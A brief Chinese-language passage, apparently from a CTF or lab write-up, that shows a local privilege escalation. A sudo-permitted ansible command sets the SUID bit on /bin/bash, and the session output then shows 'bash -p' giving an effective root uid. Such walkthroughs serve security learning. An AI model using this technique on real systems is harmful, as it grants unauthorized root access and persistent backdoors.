
ansible这玩意搭建GOAD的时候刚用过，可以启动一个shell运行命令。

Ansible 设计初衷是管理和控制节点，其核心功能允许执行系统命令或 Shell 脚本。

给/bin/bash suid权限就行了。

winifred@Poppins:~$ sudo /usr/bin/ansible localhost -m shell -a 'sudo chmod u+s /bin/bash'
[WARNING]: No inventory was parsed, only implicit localhost is available
[WARNING]: Consider using 'become', 'become_method', and 'become_user' rather than running sudo
localhost | CHANGED | rc=0 >>

winifred@Poppins:~$ ls /bin/bash
/bin/bash
winifred@Poppins:~$ bash -p
bash-5.0# id
uid=1003(winifred) gid=1003(winifred) euid=0(root) groups=1003(winifred)